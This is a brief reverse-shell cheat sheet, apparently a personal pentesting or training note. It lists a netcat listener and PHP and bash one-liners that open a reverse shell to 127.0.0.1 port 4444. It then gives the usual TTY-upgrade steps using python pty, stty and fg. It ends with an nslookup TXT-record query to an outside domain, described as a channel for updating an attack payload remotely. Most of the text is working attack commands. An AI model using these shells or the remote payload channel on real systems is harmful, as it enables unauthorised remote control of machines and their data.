Crash Course on Reverse Shells
Set up a listener:
nc -lv 4444
php -r '$sock=fsockopen("127.0.0.1",4444);exec("/bin/bash -i <&3 >&3 2>&3");'
bash -c 'sh -i >& /dev/tcp/127.0.0.1/4444 0>&1' 2> /dev/null 1> /dev/null
Upgrading to Interactive Shell
Note: This will override Ctrl-Z
, Ctrl-C
, so that they occur in the remote shell.
Be prepared to lose the Terminal you opened.
python -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm-256color
export SHELL=/bin/bash
Take note of size in local machine
stty size
Background your listener with Ctrl-Z
and then bring back the process:
stty raw -echo;fg
You may want to run reset
after (if you didn't set the right TERM
variable, it will prompt you for one)
And set the resolution:
stty rows <ROWS> columns <COLS>
Some script that takes advantage of a TXT record can have its attack be updated in real-time by parsing the record.
nslookup "-q=txt" omg.foolsnasty.com | grep -e "\"*\""
I suppose that in a similar fashion, one can just host the payload on some server in text form and swap out the file that way instead.